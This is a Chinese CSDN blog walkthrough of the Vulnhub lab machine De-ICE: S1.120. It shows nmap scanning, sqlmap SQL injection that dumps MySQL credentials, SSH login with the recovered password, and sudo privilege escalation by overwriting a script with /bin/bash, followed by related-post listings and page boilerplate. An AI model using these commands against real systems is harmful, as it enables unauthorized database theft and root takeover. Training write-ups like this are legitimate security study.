DE-ICE:S1.120

已于 2024-09-14 16:59:20 修改
阅读量240 收藏 9
点赞数 3
文章标签: 网络安全
于 2024-09-13 21:54:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80154010/article/details/142222266
版权

编辑虚拟网络编辑器添加新的网卡,设置仅主机模式,网段改为1

kali 设置自定义中刚刚设置的net1仅主机模式

靶机 仅主机模式

主机发现

arp-scan -l

端口扫描

nmap -sV -sC -sT -O 192.168.1.120 -p-

浏览器访问

点击add 发现这个页面

点击View Products 发现url是?id=1 可以尝试sql注入漏洞 进行sqlmap一把梭

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --dbs --batch

直接一把梭 用户名和密码

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" -D mysql --users --password --random-agent --batch

finalshell连接

用用户: ccoffee  密码: monkey 进行ssh连接

提权

利用SUID提权

find / -perm -u=s -type f 2>/dev/null            # 枚举出所有带有SUID权限的文件

最后发现/home/ccoffee/scripts/getlogs.sh文件可以提权

1) 先切换到/home/ccoffee/scripts目录下

2)输入以下命令:

mv getlogs.sh getlogs.sh.bak #先把原文件备份下来
echo "/bin/bash" > getlogs.sh #写入一个/bin/bash到和原文件名一样的文件中
chmod +x getlogs.sh #给该文件加权限

3)使用sudo 运行getlogs.sh文件

sudo ./getlogs.sh

提权成功

Gigity123
关注
Vuluhub靶机 De-ICE: S1.120(渗透测试详细)
2301_78721909的博客
07-30 405
Vuluhub靶机 De-ICE: S1.120 (from wuhu)
DE-ICE: S1.120打靶【附POC】(权限提升)
weixin_52487093的博客
07-30 558
1.安装虚拟主机,主机发现不了已解决;2.kali利用ssh连接不了,已找到替补方案;3.SUID提权
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1511
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
De-ICE_S1.120靶机
zdd1453691081的博客
07-29 169
【代码】De-ICE_S1.120靶机。
De-ICE_S1.120靶机渗透测试
weixin_58786230的博客
07-29 368
【代码】De-ICE_S1.120靶机渗透测试。
De-ICE: S1.120
2301_78815619的博客
09-14 401
经过尝试,使用其账户进行SSH登录,最终使用账户:ccoffee 密码:starwars 登录(刚开始已经扫描出了22端口了)dirsearch -u http://192.168.1.120 经过拼接访问,没啥重要信息。靶机默认仅主机网卡IP为192.168.1.120,最好设置一个与靶机同网段的网卡。(1)先切换到/home/ccoffee/scripts目录下。给kali添加一个网卡,并设置为仅主机,并且网段为1。在点击到Add的时候,发现页面跳转到一个提交页面。发现出现了参数,直接SQL注入。
3.DE-ICE: S1.140靶机
Sam5ara的博客
01-16 476
vulnhub
Vulnhub靶机:DE-ICE:S1.120
whoami
09-13 709
Vulnhub靶机:DE-ICE:S1.120实战
vulnhub系列:De-ICE_S1.120靶机
jq_j37的博客
07-30 424
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段。
安装Paddle-ChatDocuments大模型
2301_81887304的博客
01-02 1754
利用LangChain和ChatGLM-6B系列模型制作的Webui, 提供基于本地知识的大模型应用.
WebRTC56版本SDP详细解析
热门推荐
chinabinlang的专栏
01-24 1万+
http://blog.csdn.net/onlycoder_net/article/details/76702432 v=0 //sdp版本号,一直为0,rfc4566规定 o=- 7017624586836067756 2 IN IP4 127.0.0.1 // RFC 4566 o=<username> <sess-id> <sess-versio...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
健身房管理系统代码系统 Springboot健身房管理系统(程序,中文注释)
09-26
健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统 1、资源说明:健身房管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、M
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
09-26
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
电池镍片自动检测设备_三维3D设计图纸.zip
09-26
电池镍片自动检测设备_三维3D设计图纸.zip
小微园区数字化建设方案.pptx
09-26
小微园区数字化建设方案
python科学数据笔记(Python Scientific lecture notes) 英文版
最新发布
09-26
主要介绍如何使用python来处理科学的大数据,NumPy,Matplotlib等都有大量的实例 I Getting started with Python for science 2 1 Scientific computing with tools and workflow 3 2 The Python language 8 3 NumPy: creating and manipulating numerical data 5 Matplotlib 6 Scipy : high-level scientific com II Advanced topics 7 Advanced Python Constructs 8 Advanced Numpy 9 Debugging code 10 Optimizing code 12 Image manipulation and processing using Numpy and Scipy
cd C:\Program Files\FlightGear fgfs --fg-root=C:\Program Files\FlightGear\data --aircraft=ufo --in-air --fdm=null --telnet=5501 --telnet=5502 --telnet=5503 --disable-ai-traffic --disable-real-weather-fetch --disable-random-objects --disable-terrasync --disable-clouds --disable-sound --disable-panel --disable-hud --disable-specular-highlight --timeofday=noon --prop:/sim/rendering/multi-sample-buffers=1 --prop:/sim/rendering/multi-samples=2 --prop:/sim/rendering/draw-mask-clouds=false --prop:/sim/rendering/draw-mask-terrain=true --prop:/sim/rendering/draw-mask-objects=true --prop:/sim/rendering/draw-mask-lights=true --prop:/sim/rendering/draw-mask-internal=true --prop:/sim/rendering/draw-mask-cockpit=true --prop:/sim/rendering/draw-mask-effects=true --prop:/sim/rendering/draw-mask-overlay=true --prop:/sim/rendering/draw-mask-world=true --prop:/sim/rendering/draw-mask-panel=true --prop:/sim/rendering/draw-mask-vr=true --prop:/sim/rendering/draw-mask-2d=true --prop:/sim/rendering/draw-mask-3d=true --prop:/sim/rendering/draw-mask-sky=true --prop:/sim/rendering/draw-mask-shadows=true --prop:/sim/rendering/draw-mask-cabin=true --prop:/sim/rendering/draw-mask-weather=true --prop:/sim/rendering/draw-mask-stereo=true --prop:/sim/rendering/draw-mask-internal-cockpit=true --prop:/sim/rendering/draw-mask-internal-windows=true --prop:/sim/rendering/draw-mask-internal-instruments=true --prop:/sim/rendering/draw-mask-internal-overlay=true --prop:/sim/rendering/draw-mask-internal-effects=true --prop:/sim/rendering/draw-mask-internal-lights=true --prop:/sim/rendering/draw-mask-internal-world=true --prop:/sim/rendering/draw-mask-internal-panel=true --prop:/sim/rendering/draw-mask-internal-3d=true --prop:/sim/rendering/draw-mask-internal-sky=true --prop:/sim/rendering/draw-mask-internal-cabin=true --prop:/sim/rendering/draw-mask-internal-weather=true --prop:/sim/rendering/draw-mask-internal-stereo=true --prop:/sim/rendering/draw-mask-internal-shadow=true --prop:/sim/rendering/draw-mask-internal-stall=true --prop:/sim/rendering/draw-mask-internal-aoa=true --prop:/sim/rendering/draw-mask-internal-thermal=false --prop:/sim/rendering/draw-mask-internal-ice=false --prop:/sim/rendering/draw-mask-internal-glass=true --prop:/sim/rendering/draw-mask-internal-dead=true --prop:/sim/rendering/draw-mask-internal-reflection=true程序显示错误unknown command-line option: enable-hud-2d怎么解决
05-10
-disable-random-objects --disable-terrasync --disable-clouds --disable-sound --disable-panel --timeofday=noon --prop:/sim/rendering/multi-sample-buffers=1 --prop:/sim/rendering/multi-samples=2 --prop:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值